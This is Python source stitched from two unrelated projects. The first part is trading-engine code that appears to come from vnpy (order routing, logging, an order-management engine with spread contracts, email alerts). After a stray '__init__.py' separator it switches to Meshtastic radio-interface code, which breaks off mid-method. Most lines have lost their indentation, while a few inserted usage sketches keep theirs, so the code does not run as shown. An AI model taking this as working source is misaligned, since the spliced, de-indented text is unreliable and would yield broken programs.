def get_all_gateway_names(self) -> List[str]:
"""
Get all names of gateways added in main engine.
"""
return list(self.gateways.keys())
def get_all_gateway_status(self) -> List[dict]:
"""
Get all gateway status
:return:
"""
return list([{k: v.get_status()} for k, v in self.gateways.items()])
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
If no gateway_name is specified, the subscribe request is forwarded to every gateway
"""
if gateway_name:
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
else:
for gateway in self.gateways.values():
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
Extended to support custom spread contracts: algo orders sent by cta_strategy_pro are handled by the algo engine
"""
# Custom spread contract: hand it over to the algo engine
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.send_spd_order(
req=req,
gateway_name=gateway_name)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> bool:
"""
Send cancel order request to a specific gateway.
"""
# Custom spread contract: hand it over to the algo engine
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.cancel_spd_order(
req=req)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.cancel_order(req)
return False
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
Send a batch of order requests to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
self.write_log(f'网关为空,请检查合约得网关是否与连接得网关一致')
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
if hasattr(self, 'save_contracts'):
self.save_contracts()
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
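# Hedged usage sketch (not called anywhere in this module): how a launcher
# script might wire MainEngine to a gateway and subscribe to one contract.
# The gateway class, the connection setting dict and the symbol/exchange used
# below are placeholders supplied by the caller, not part of this module.
def _example_main_engine_usage(gateway_class: Type[BaseGateway], connect_setting: dict) -> "MainEngine":
    main_engine = MainEngine()  # creates and starts its own EventEngine
    gateway = main_engine.add_gateway(gateway_class)  # uses the gateway's own name
    main_engine.connect(connect_setting, gateway.gateway_name)
    # Route the subscription through the engine so it reaches the right gateway
    req = SubscribeRequest(symbol="rb2310", exchange=Exchange.SHFE)  # placeholder contract
    main_engine.subscribe(req, gateway.gateway_name)
    return main_engine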
class BaseEngine(ABC):
"""
Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
self.logger = None
self.create_logger(engine_name)
def create_logger(self, logger_name: str = 'base_engine'):
"""
Create a logger dedicated to this engine.
:param logger_name: logger name, defaults to the engine name
:return:
"""
log_path = get_folder_path("log")
log_filename = str(log_path.joinpath(logger_name))
print(u'create logger:{}'.format(log_filename))
self.logger = setup_logger(file_name=log_filename, name=logger_name,
log_level=SETTINGS.get('log.level', logging.DEBUG))
def write_log(self, msg: str, source: str = "", level: int = logging.DEBUG):
"""
Write a log message.
:param msg: log content
:param source: source of the message
:param level: log level
:return:
"""
if self.logger:
if len(source) > 0:
msg = f'[{source}]{msg}'
self.logger.log(level, msg)
else:
log = LogData(msg=msg, level=level, gateway_name='')
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def close(self):
""""""
pass
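# Hedged sketch (illustrative subclass, not registered anywhere): a concrete
# engine only has to forward its name to BaseEngine, which sets up a dedicated
# per-engine log file, after which write_log() can be used directly. The name
# "example" below is a placeholder.
class _ExampleEngine(BaseEngine):
    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        super().__init__(main_engine, event_engine, "example")

    def start(self) -> None:
        # Goes to this engine's own log file because self.logger was created in BaseEngine
        self.write_log("example engine started", source="demo", level=logging.INFO)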
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
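# Hedged configuration sketch: these are the SETTINGS keys LogEngine consults
# above; the values shown are illustrative, not project defaults.
def _example_log_settings() -> dict:
    return {
        "log.active": True,          # create the "VN Trader" logger at all
        "log.level": logging.INFO,   # level applied to the logger and its handlers
        "log.console": True,         # add a StreamHandler
        "log.file": True,            # add a daily vt_YYYYMMDD.log FileHandler
    }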
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.today_contracts: Dict[str, ContractData] = {}
# Custom contracts
self.custom_contracts = {} # vt_symbol: ContractData
self.custom_settings = {} # symbol: dict
self.symbol_spd_maping = {} # symbol: [spd_symbol]
self.prices = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
self.load_contracts()
def __del__(self):
"""保存缓存"""
self.save_contracts()
def load_contracts(self) -> None:
"""从本地缓存加载合约字典"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
if os.path.exists(contract_file_name):
try:
with bz2.BZ2File(contract_file_name, 'rb') as f:
self.contracts = pickle.load(f)
self.write_log(f'加载缓存合约字典:{contract_file_name}')
except Exception as ex:
self.write_log(f'加载缓存合约异常:{str(ex)}')
# Update custom contracts
custom_contracts = self.get_all_custom_contracts()
self.get_all_custom_contracts(rtn_setting=True)
for contract in custom_contracts.values():
# Update the contract cache
self.contracts.update({contract.symbol: contract})
self.contracts.update({contract.vt_symbol: contract})
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
# Get the active/passive legs of the custom contract
setting = self.custom_settings.get(contract.symbol, {})
leg1_symbol = setting.get('leg1_symbol')
leg2_symbol = setting.get('leg2_symbol')
# Build the mapping
for symbol in [leg1_symbol, leg2_symbol]:
spd_mapping_list = self.symbol_spd_maping.get(symbol, [])
# Update the mapping: symbol => spd_symbol
if (not contract.symbol.endswith('.SPD')) and contract.symbol not in spd_mapping_list:
spd_mapping_list.append(contract.symbol)
self.symbol_spd_maping.update({symbol: spd_mapping_list})
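    # Hedged illustration of the assumed custom-contract setting format (keys
    # inferred from how load_contracts and create_spd_position_event read the
    # setting dict); the symbols and values below are placeholders, not real
    # contracts, and this helper is not used elsewhere.
    @staticmethod
    def _example_custom_setting() -> dict:
        return {
            "leg1_symbol": "rb2310",   # active leg
            "leg2_symbol": "rb2401",   # passive leg
            "leg1_ratio": 1,
            "leg2_ratio": 1,
            "is_spread": True,         # price = leg1 - leg2
            "is_ratio": False,         # price = 100 * leg1 / leg2
        }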
def save_contracts(self) -> None:
"""持久化合约对象到缓存文件"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
with bz2.BZ2File(contract_file_name, 'wb') as f:
if len(self.today_contracts) > 0:
self.write_log(f'保存今日合约对象到缓存文件')
pickle.dump(self.today_contracts, f)
else:
pickle.dump(self.contracts, f)
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_price = self.get_price
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_exchange = self.get_exchange
self.main_engine.get_custom_contract = self.get_custom_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
self.main_engine.get_all_custom_contracts = self.get_all_custom_contracts
self.main_engine.get_mapping_spd = self.get_mapping_spd
self.main_engine.save_contracts = self.save_contracts
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
if '&' not in tick.symbol and tick.last_price:
self.prices[tick.vt_symbol] = tick.last_price
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from the dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
if position.exchange != Exchange.SPD:
self.create_spd_position_event(position.symbol, position.direction)
def reverse_direction(self, direction):
"""返回反向持仓"""
if direction == Direction.LONG:
return Direction.SHORT
elif direction == Direction.SHORT:
return Direction.LONG
return direction
def create_spd_position_event(self, symbol, direction):
"""创建自定义品种对持仓信息"""
spd_symbols = self.symbol_spd_maping.get(symbol, [])
if not spd_symbols:
return
for spd_symbol in spd_symbols:
spd_setting = self.custom_settings.get(spd_symbol, None)
if not spd_setting:
continue
leg1_symbol = spd_setting.get('leg1_symbol')
leg2_symbol = spd_setting.get('leg2_symbol')
leg1_contract = self.contracts.get(leg1_symbol)
leg2_contract = self.contracts.get(leg2_symbol)
spd_contract = self.contracts.get(spd_symbol)
if leg1_contract is None or leg2_contract is None:
continue
leg1_ratio = spd_setting.get('leg1_ratio', 1)
leg2_ratio = spd_setting.get('leg2_ratio', 1)
# Find the positions of leg1/leg2 and determine the direction of the spread
spd_pos = None
if leg1_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{direction.value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg2_pos = self.positions.get(k2)
spd_direction = direction
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
elif leg2_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{direction.value}"
leg2_pos = self.positions.get(k2)
spd_direction = self.reverse_direction(direction)
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
else:
continue
if leg1_pos is None or leg2_pos is None: # or leg1_pos.volume ==0 or leg2_pos.volume == 0:
continue
            # Derive the minimum spread volume from the leg1/leg2 volumes and their ratios
spd_volume = min(int(leg1_pos.volume / leg1_ratio), int(leg2_pos.volume / leg2_ratio))
if spd_volume <= 0 and spd_pos is None:
continue
if spd_setting.get('is_ratio', False) and leg2_pos.price > 0:
                spd_price = 100 * (leg1_pos.price * leg1_ratio) / (leg2_pos.price * leg2_ratio)
elif spd_setting.get('is_spread', False):
spd_price = leg1_pos.price * leg1_ratio - leg2_pos.price * leg2_ratio
else:
spd_price = 0
spd_pos = PositionData(
gateway_name=spd_contract.gateway_name,
accountid=leg1_pos.accountid,
symbol=spd_symbol,
exchange=Exchange.SPD,
direction=spd_direction,
volume=spd_volume,
price=spd_price
)
event = Event(EVENT_POSITION, data=spd_pos)
self.event_engine.put(event)
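        # Illustrative sketch (not from the original engine, numbers hypothetical): with
        # leg1_ratio=1 and leg2_ratio=1, a 10-lot long leg1 position and a 12-lot short
        # leg2 position yield a long spread position of min(10 / 1, 12 / 1) = 10 lots,
        # priced as leg1 - leg2 for an is_spread contract or 100 * leg1 / leg2 for an
        # is_ratio contract.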
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
self.contracts[contract.symbol] = contract
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
def get_exchange(self, symbol: str) -> Exchange:
"""获取合约对应的交易所"""
contract = self.contracts.get(symbol, None)
if contract is None:
return Exchange.LOCAL
return contract.exchange
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_price(self, vt_symbol):
"""
        Get the latest price by vt_symbol
:param vt_symbol:
:return:
"""
return self.prices.get(vt_symbol, None)
def get_order(self, vt_orderid) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
def get_custom_contract(self, symbol):
"""
        Get the settings of a custom contract
:param symbol: "pb2012-1-pb2101-1-CJ"
:return: {
"name": "pb跨期价差",
"exchange": "SPD",
"leg1_symbol": "pb2012",
"leg1_exchange": "SHFE",
"leg1_ratio": 1,
"leg2_symbol": "pb2101",
"leg2_exchange": "SHFE",
"leg2_ratio": 1,
"is_spread": true,
"size": 1,
"margin_rate": 0.1,
"price_tick": 5
}
"""
return self.custom_settings.get(symbol, None)
def get_all_custom_contracts(self, rtn_setting=False):
"""
        Get all custom contracts
:return:
"""
if rtn_setting:
if len(self.custom_settings) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
return self.custom_settings
if len(self.custom_contracts) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
self.custom_contracts = c.get_contracts()
return self.custom_contracts
def get_mapping_spd(self, symbol):
"""根据主动腿/被动腿symbol,获取自定义套利对的symbol list"""
return self.symbol_spd_maping.get(symbol, [])
class CustomContract(object):
"""
定制合约
# 适用于初始化系统时,补充到本地合约信息文件中 contracts.vt
# 适用于CTP网关,加载自定义的套利合约,做内部行情撮合
"""
# 运行本地目录下,定制合约的配置文件(dict)
file_name = 'custom_contracts.json'
def __init__(self):
"""构造函数"""
from vnpy.trader.utility import load_json
self.setting = load_json(self.file_name) # 所有设置
def get_config(self):
"""获取配置"""
return self.setting
def get_contracts(self):
"""获取所有合约信息"""
d = {}
from vnpy.trader.object import ContractData, Exchange
for symbol, setting in self.setting.items():
gateway_name = setting.get('gateway_name', None)
if gateway_name is None:
gateway_name = SETTINGS.get('gateway_name', '')
vn_exchange = Exchange(setting.get('exchange', 'SPD'))
contract = ContractData(
gateway_name=gateway_name,
symbol=symbol,
exchange=vn_exchange,
name=setting.get('name', symbol),
size=setting.get('size', 100),
product=None,
pricetick=setting.get('price_tick', 0.01),
margin_rate=setting.get('margin_rate', 0.1)
)
d[contract.vt_symbol] = contract
return d
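# Minimal usage sketch (hypothetical file contents), assuming a custom_contracts.json
# exists in the local runtime directory:
#
#   c = CustomContract()
#   settings = c.get_config()      # raw dict keyed by spread symbol
#   contracts = c.get_contracts()  # ContractData objects keyed by vt_symbol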
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
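# Usage sketch: other engines reach this through the method bound onto the main engine
# above; the receiver address below is a placeholder, not a real setting.
#
#   main_engine.send_email("Daily report", "All systems normal", receiver="ops@example.com")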
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings; if you write to this, the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- myNodeInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.position(packet) - delivers a received packet as a dictionary, if you only care about a particular
type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.user(packet)
- meshtastic.receive.data(packet)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
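For instance, a handler for data packets might pull out those fields like this (a sketch that
relies only on the dictionary layout described above; the handler name is arbitrary):
```
def onDataReceive(packet, interface):
    data = packet["decoded"]["data"]
    if data.get("typ") == "CLEAR_TEXT":
        print(f"text: {data['text']}")
    else:
        print(f"payload: {data['payload']}")
```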
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
"""
import socket
import pygatt
import google.protobuf.json_format
import serial
import threading
import logging
import time
import sys
import traceback
import base64
import platform
from . import mesh_pb2
from . import util
from pubsub import pub
from dotmap import DotMap
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
BROADCAST_ADDR = "^all" # A special ID that means broadcast
# if using 8 bit nodenums this will be shortened on the target
BROADCAST_NUM = 0xffffffff
MY_CONFIG_ID = 42
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand"""
OUR_APP_VERSION = 172
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = False
if not noProto:
self._startConfig()
def sendText(self, text, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
dataType=mesh_pb2.Data.CLEAR_TEXT, wantAck=wantAck, wantResponse=wantResponse)
def sendData(self, byteData, destinationId=BROADCAST_ADDR, dataType=mesh_pb2.Data.OPAQUE, wantAck=False, wantResponse=False):
"""Send a data packet to some other node
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
meshPacket = mesh_pb2.MeshPacket()
meshPacket.decoded.data.payload = byteData
meshPacket.decoded.data.typ = dataType
meshPacket.decoded.want_response = wantResponse
return self.sendPacket(meshPacket, destinationId, wantAck=wantAck)
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
meshPacket = mesh_pb2.MeshPacket()
if(latitude != 0.0):
meshPacket.decoded.position.latitude_i = int(latitude / 1e-7)
if(longitude != 0.0):
meshPacket.decoded.position.longitude_i = int(longitude / 1e-7)
if(altitude != 0):
meshPacket.decoded.position.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
meshPacket.decoded.position.time = int(timeSec)
meshPacket.decoded.want_response = wantResponse
return self.sendPacket(meshPacket, destinationId, wantAck=wantAck)
def sendPacket(self, meshPacket, destinationId=BROADCAST_ADDR, wantAck=False):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
toRadio = mesh_pb2.ToRadio()
# FIXME add support for non broadcast addresses
if isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
else:
nodeNum = self.nodes[destinationId]['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
self._sendToRadio(toRadio)
return meshPacket
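        # Usage sketch (IDs are hypothetical): sendText/sendData funnel through here, so
        #   interface.sendText("hi")                       # broadcast (BROADCAST_ADDR)
        #   interface.sendText("hi", destinationId=1234)   # raw node number
        # A string node ID can only be resolved once it appears in interface.nodes.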
def writeConfig(self):
"""Write the current (edited) radioConfig to the device"""
        if self.radioConfig is None:
raise Exception("No RadioConfig has been read")
t = mesh_pb2.ToRadio()
t.set_radio.CopyFrom(self.radioConfig)
self._sendToRadio(t)
@property
def channelURL(self):
"""The sharable URL that describes the current channel
"""
bytes = self.radioConfig.channel_settings.SerializeToString()
s = base64.urlsafe_b64encode(bytes).decode('ascii')
return f"https://www.meshtastic.org/c/#{s}"
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected = False
pub.sendMessage("meshtastic.connection.lost", interface=self)
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
self.isConnected = True
pub.sendMessage("meshtastic.connection.established", interface=self)
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self._nodesByNum = {} # nodes keyed by nodenum
self.radioConfig = None
self.currentPacketId = None
startConfig = mesh_pb2.ToRadio()
startConfig.want_config_id = MY_CONFIG_ID # we don't use this value
self._sendToRadio(startConfig)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleFromRadio(self, fromRadioBytes):
"""
        Handle a packet that arrived from the radio (update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
logging.debug(f"Received: {asDict}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
if self.myInfo.min_app_version > OUR_APP_VERSION:
raise Exception(
"This device needs a newer python client, please \"pip install --upgrade meshtastic\"")
# start assigning our packet IDs from the opposite side of where our local device is assigning them
self.currentPacketId = (
self.myInfo.current_packet_id + 0x80000000) & 0xffffffff
elif fromRadio.HasField("radio"):
self.radioConfig = fromRadio.radio
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
self._nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
elif fromRadio.config_complete_id == MY_CONFIG_ID:
# we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id
self._connected()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
            position {Position dictionary} -- object to fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self._nodesByNum[num]["user"]["id"]
except:
logging.warn("Node not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self._nodesByNum:
return self._nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self._nodesByNum[nodeNum] = n
return n
